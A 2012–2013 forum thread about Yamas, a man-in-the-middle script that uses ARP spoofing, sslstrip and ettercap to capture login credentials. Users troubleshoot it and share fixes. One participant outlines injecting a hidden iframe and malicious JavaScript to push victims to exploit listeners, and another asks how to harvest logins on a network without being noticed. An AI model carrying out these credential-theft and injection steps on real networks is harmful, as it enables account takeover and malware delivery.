comaX, I know that fell bro. I am writing a perl script to help with ASM ghostwriting automation, and since I don't really know perl, and refuse to write it in py, I basically lost track of the number of times I've had to rewrite portions and figure out what I wanted to do with them. Incidentaly, anyone who knows perl and is willing to help would be amazing. I don't want to post it in the forums until its done though.

hannah
06-29-2012, 05:25 PM
@Hannah : you didn't tell me if it worked for other sites or not. Are you using a local connection page maybe ? (fr.msn.com ; us.msn.com... I just made them up, but you know what I mean)

No so far it did not work for any other sites either. Yes I have tried sites like http://www.backtrack-linux.org/ as well which is not https. Anyway is there any config file (e.g; etter.conf ) I need to manually change or does your script do that automatically.

What I am thinking now to get sslstrip / ettercap manually working in my machine and then proceed.

@ShadowMaster: Will heed your advice.

hannah
06-29-2012, 07:01 PM
Well all sorted now.. first of all thanks a lot for this beautiful script..works like a charm. Now about my stupidity :o

Basically I was sniffing my own ip (Backtrack machine), the same machine where from I was launching the attack.

Anyway ran another virtual machine and logged in various accounts from that VM and your script is working like a charm. Thanks a lot comaX.

comaX
06-29-2012, 08:35 PM
Well all sorted now.. first of all thanks a lot for this beautiful script..works like a charm. Now about my stupidity :o

Basically I was sniffing my own ip (Backtrack machine), the same machine where from I was launching the attack.

Anyway ran another virtual machine and logged in various accounts from that VM and your script is working like a charm. Thanks a lot comaX.

My pleasure ;) I'm glad you sorted the issue yourself in the end! Next time, do mention VMs, they are "interesting" pieces of work networking wise...

hannah
06-29-2012, 10:11 PM
My pleasure ;) I'm glad you sorted the issue yourself in the end! Next time, do mention VMs, they are "interesting" pieces of work networking wise...

I am glad too. And thanks to you for your script.

Cheers

comaX
08-26-2012, 05:45 PM
Hi everyone ! I just updated Yamas for R3, go and grab it ! http://yamas.comax.fr

Please report any problem, even if it should run just fine with BT5R3 !

ShadowMaster
09-04-2012, 08:14 AM
Hey man, great script as usual blah blah blah. Two things.
1) I can now officially confirm the update bug is gone. :D

2) I have an idea for a new option. Targeted RCE by way of content replacement of HTML. Something like this. ettercap and others have filters that allow for the dynamic replacement of content that is sent to the victim. So instead of doing things like switching "You're hired!" for "You're fired!" as a prank, do things like switch "</HTML>" for "<iframe SRC={HOSTIP} width="0" height="0"></iframe></HTML>" to redirect him to your waiting client side exploit. Or better yet, embed evil java script to download and run a client side exe to send a meterpreter session to your waiting listener. Or any payload.

I suggest this here instead of to rel1k for SET because most exploit frameworks are WAN, and this tool is mainly LAN. Let me know what you think...

comaX
09-04-2012, 12:27 PM
It's a good point you're raising and I've thought of doing that before. But here's the thing, the milion dollar question : where do I stop ? I intended Yamas to be "another MITM script", not a hack-everything tool (even though, yes it still pertains to that domain). So, I added stuff here and there because they're easy and fun to use but I still struggle defining where it should stop. A while back I had in mind to do a simplified Yamas : no questions asked, all-automated and more tools, for exploitation for instance. But I don't know, I still can't set my mind to it.
Maybe somehow I think what there is for now is enough, and if you want to exploit by redirecting to your own server, you could/should do it sideways, by yourself. By the way, since there is DNS spoofing, you can alredy kind of do that ;) but don't tell :p
Modifications of the code on-the-fly is something really sweet though. You actually make me want to do that more powerful project. But hey, that won't see the light of the day before a f-ing while !

ShadowMaster
09-04-2012, 05:13 PM
In a bold attempt to convince you to add this to yamas as a opposed to making a new tool, here's my logic.
You wrote yamas as a tool to present to people the dangers of ARP-spoofing and MiTM attacks. Any attack that falls until the status of an attack that can be carried out as a *DIRECT RESULT* of a MiTM falls under yamas's domain. To say that yamas is really just a simple tool to snoop, with some advanced features thrown in for fun, is to deny the true purpose and brilliance of the tool.

Yamas's purpose is to provide a framework that people can point to and say "This is why you need X!", whatever X may be. To say that the danger of MiTM starts and ends with passwords and URL's is foolish and naive. There is so much more.
To incorporate RCE with iframe redirection, javascript enbedding to an MSF listener, evil JS to download and run a trojan, or XSS to hook to BeEF is to truly be able to say "I have a tool that can show you how truly dangerous MiTM is." to anyone. As the expression goes "You can't argue with a root shell." It's an obvious extension of the tool. It's not a separate tool. MiTM is about what hackers would do in that situation. If a hacker has MiTM access, rest assured he will gain RCE with it. If the pentester can run your tool and show the client the real dangers, then the client will protect himself. If not, nobody cares about theoretics.

To add these to your script would be to fully appreciate what MiTM is, and provide a framework to protect people from it in the long term.

comaX
09-04-2012, 07:40 PM
You, sir, are totally right. I must level with you though: that doesn't mean I'll do it (even if it would be awesome).

Who knows, maybe someday you'll get a pre-release ;)

ShadowMaster
09-04-2012, 07:54 PM
and credit! :D Imma hold you to that though, cuz my explanation was beautiful. :)

ShadowMaster
09-13-2012, 07:59 PM
BUMP... Sorry, but I needed comaX to see this.

Here's a *VERY* easy way to implement the idea I had. Take the filter from here, and paste it into a text file: http://www.hackyeah.com/2010/10/ettercap-filters-with-metasploit-browser_autopwn/
Next, ask the user, what the redirection URL he wants the attackees to be redirected to is.
Replace the URL and IP in there with the users, and compile the new filter with ettercap, then restart ettercap with that filter. All this assumes that the user has a waiting listen with a payload, be it BeEF, msf, SET or a custom thing. You may need to add a </iframe> after the added iframe, that's something that can come with testing. But this is very simple and easy, and it will demonstrate the danger of MiTM also. :)
Tell me what you think...

comaX
09-14-2012, 02:00 AM
I'm installing BT in a VM so I don't have to reboot each time an idea pops into my head, forcing me to... yes, stop my music. So, I should from now on be more reactive. I then shall start with what you just posted. I'll see what I can make of it.

There will probably be an update in the next few days since some people are experiencing trouble with looping the parsing. It had been a while I didn't test it and it seems Facebook sends way too much crap. Am I the only one to get that ? Yes it's still cleaner than looking at sslstrip's logs, but hell, it looks awful. I'll see if I can manage something.

Edit : Updated ! I'm feeling quite good about the modifications made to the parser. Tell me what you think ! It still works with every site I tested.
Edit2 : Shadow Master, wait a bit before I give feedback to you ideas ;)

ShadowMaster
09-14-2012, 08:01 AM
I shall wait. :)
BTW, the idea itself can be incorporated with an absolute minimum of fuss from the filter I gave, the only issue would be that it can never replace the original filter template, and that even if the script was started with arpspoof, it must be continued with ettercap. I look forward to when this is added to your script. :)

Also, if you go on IRC at all, you should come to #offtopicsec where we can talk more in depth and more responsively about these things.

comaX
09-18-2012, 01:24 PM
Ok, so I read the article. It's very interesting indeed. I think I might implement something similar but not to the full extent. I mean, I could implement html code modifications on the fly, which would allow someone who knows what he's doing to do what you intended. I'll do tests and stuff, and get back to you.

ShadowMaster
09-18-2012, 08:23 PM
I've been obsessing over this for the past few days, and the algo I came up with was this:

Start the script the way it normally starts.
Add an option in additional tools for iframe injection.
If the user runs it, warn him that it will turn off arpspoof and run ettercap.
If the user clicks yes, kill arpspoof, then:

Ask the user for the redirection URL to inject.
Echo the contents of that filter with the redirection URL into a file.
Use ettercap to compile that file.
Run ettercap with the previous port, ip, and netmask to spoof settings, and add the filter to the command.
(At this point everything is the same as if the user had run "yamas -e" but there is the added benefit of the filter.)
Warn the user that the only thing he has accomplished was that the victim will somehow send HTTP requests to the redirection UR, and that the user must supply his own listener to respond to those requests. (This prevents sk1dd13s from seeing your tool as a one-stop pwn tool.)
Move on with the script as normal, with a seperate window logging the ettercap replacement messages.

Tell me what you think...

lokitround1
10-02-2012, 07:24 AM
Yep! Works with my setup!

Thank you!!

lokitround1
10-03-2012, 07:15 AM
Perrrffeccttt :D

working well!

comaX
10-03-2012, 07:56 AM
Hey, SM (no pun intended)! I just saw your post (or I forgot I saw it). I have very little time on my hands, but I started working on a more-to-the-point version on Yamas, that will include that. Can't say when I'll be done with it, I'm really over booked by studies.

It's on the way though...

manco1911
10-10-2012, 05:58 PM
hi man,
firs of all i have to congratulate u for this work, its really awesome.
i have it on my n900 for some time now, works flawlessly.

I just downloaded the last script on your site though "20120827" and tried to run it on BT5R3 VM, and it seems not to work as it is intended..
did you had any kind of issue on this ?

running the scripts seems to do nothing..
if you ^C it, it will output the intended output..
but it wont show any kind of options/menu or anything if you let the script run...

it seems its not getting out of the Update_process.. (just debugging with echo "test" around.. lol )

any insights ?

BTW its a recently downloaded VM with nothing modified on it..

airwolf3000
10-10-2012, 10:11 PM
Comax, I have never have any problem with with script, no matter what version, I think its wonderful and as long as you keep updating it, I'll keep on using.

Many of us have not thanks you enough for it, there are many people afraid to write a few letters in the post. because they get "----" by others, so I think most people are very cautious about, what to ask and how to phase it. (ref: Why is this forum dying or something like it)

I think you have done a wonderful job and we are lucky to have share it.

I will shut up before somebody may have a different say about expressing thanks to you

Thanks Comax

wewe73
11-24-2012, 06:52 PM
Comax, I have never have any problem with with script, no matter what version, I think its wonderful and as long as you keep updating it, I'll keep on using.

Many of us have not thanks you enough for it, there are many people afraid to write a few letters in the post. because they get "----" by others, so I think most people are very cautious about, what to ask and how to phase it. (ref: Why is this forum dying or something like it)

I think you have done a wonderful job and we are lucky to have share it.

I will shut up before somebody may have a different say about expressing thanks to you

Thanks Comax

i used this script against my smart phone and laptop win 7 with the latest security software and did not let me down. i have said thank you thank you before and here i am again saying big thanks to comax :-)

comaX
11-25-2012, 06:33 AM
Comax, I have never have any problem with with script, no matter what version, I think its wonderful and as long as you keep updating it, I'll keep on using.[...]

Thanks Comax


i used this script against my smart phone and laptop win 7 with the latest security software and did not let me down. i have said thank you thank you before and here i am again saying big thanks to comax :-)

Gentlemen, I am humbled. Thanks for the positive feedback !

ShadowMaster
11-27-2012, 04:31 PM
I'm still not giving up on my dream of seeing ettercap filters as one of the options comaX. How's that coming along?

comaX
11-27-2012, 06:17 PM
Oh man... I am so f'ing swamped right now... I started writing a new version (and not update) of Yamas a while back but haven't had the time to do much on it... This year was supposed to be easier study-wise, but guess what? It absolutely is not. It's worse. If I get the time during the holidays I'll try to work on it, but I'm supposed to be preparing exams for early January.

I'll keep you guys posted.

aronian
12-06-2012, 04:04 PM
Hi, first of all... awesome script !! Now, I was just wondering, is there is a way to know exactly from which IP address the logs are coming if you are poisoning a whole network? And is it possible to stop the ARP poisoning on just the selected IP, but continuing poisoning the whole network?

I am asking this because there a lots of SSL pages (like facebook or hotmail) that after running the script, they send to us the username and password information but the user is not able to correctly access them, for example in hotmail the user returns to the login page again and again, and in facebook the user can access to his account but it doesn't load properly.

So my idea was to stop the ARP poisoning on just the selected IP address once I got his credentials, so he will now be able to correctly access to all pages.

Of course I am not intending to do this for the wrong purposes, I just think that if you are going to test your network doing a MITM, you should do it right without anyone noticing what you are doing, even you have their authorization to do so.

FettMaster
12-23-2012, 08:32 PM
Hi. The Script itś great, but since I use BT5R3 the scripts doesnt works fine.

Itś run smooth, but the password windows doesnt show anything. I'm triying facebook, twitter, gmail, etc. and nothing. anyone can help me? Thanks a lot.

comaX
12-24-2012, 04:45 AM
Hi, first of all... awesome script !! Now, I was just wondering, is there is a way to know exactly from which IP address the logs are coming if you are poisoning a whole network? And is it possible to stop the ARP poisoning on just the selected IP, but continuing poisoning the whole network?
That is not possible, unfortunately. What you can do is attack all connected equipment independently, and then stop them separately. And, nope, sslstrip doesn't log lan IP. You could run wireshark aside to check for matching packets.


I am asking this because there a lots of SSL pages (like facebook or hotmail) that after running the script, they send to us the username and password information but the user is not able to correctly access them, for example in hotmail the user returns to the login page again and again, and in facebook the user can access to his account but it doesn't load properly.
Yeahp, that's because of sslstrip I think. Have you tried with ettercap ? (yamas -e)


So my idea was to stop the ARP poisoning on just the selected IP address once I got his credentials, so he will now be able to correctly access to all pages.
Of course I am not intending to do this for the wrong purposes, I just think that if you are going to test your network doing a MITM, you should do it right without anyone noticing what you are doing, even you have their authorization to do so.
I hear you, but nope, that's just not possible, afaik. Sorry!

wewe73
12-24-2012, 06:10 PM
Hi. The Script itś great, but since I use BT5R3 the scripts doesnt works fine.

Itś run smooth, but the password windows doesnt show anything. I'm triying facebook, twitter, gmail, etc. and nothing. anyone can help me? Thanks a lot.

it works just fine over here using BT5-R3

bahaeddine4
12-25-2012, 08:58 PM
i haven't tried this yet but does it work in the secure mode (https) ?

KillerKenny
01-07-2013, 01:44 AM
The "password" window is only saying

"Parsing /tmp/yamas.txt for credentials."

What does it mean?

comaX
01-07-2013, 01:39 PM
i haven't tried this yet but does it work in the secure mode (https) ?
You should know more about how it works. Hint : sslstrip.


The "password" window is only saying

"Parsing /tmp/yamas.txt for credentials."

What does it mean?

Means it hasn't found anything yet.

nwhit131
01-28-2013, 02:36 AM
I have a problem with the script. When it's running, https websites just timeout. Other websites work, but not those. Any help would be greatly appreciated.

Special2k3
03-20-2013, 06:26 AM
Hello,

nice script. But doesn't work for me out of the box on Backtrack 5 KDE 64bit. Always got the message "file or directory not found" while it tried to parse the log file. I noticed, that sslstrip was not running. I had to change the line 12 from


sslstrip_dir=/usr/share/sslstrip

to


sslstrip_dir=/pentest/web/sslstrip

and set the rights on sslstrip to execute.

Just for information, if anybody also runs in this problem.
If you start yamas, it should look like this:


[+] Activating sslstrip...
Choose filename to output : (default = yamas)

Sslstrip will be listening on port 8080 and outputting log in /tmp/yamas.txt

sslstrip 0.9 by Moxie Marlinspike running...

[-] Sslstrip is running.

If the "sslstrip 0.9 by Moxie Marlinspike running..." is missing in your output, then sslstrip isn't running. Even if yamas says "Sslstrip is running". You must see the "sslstrip 0.9 by Moxie Marlinspike running..." message.

Best regards

Special2k3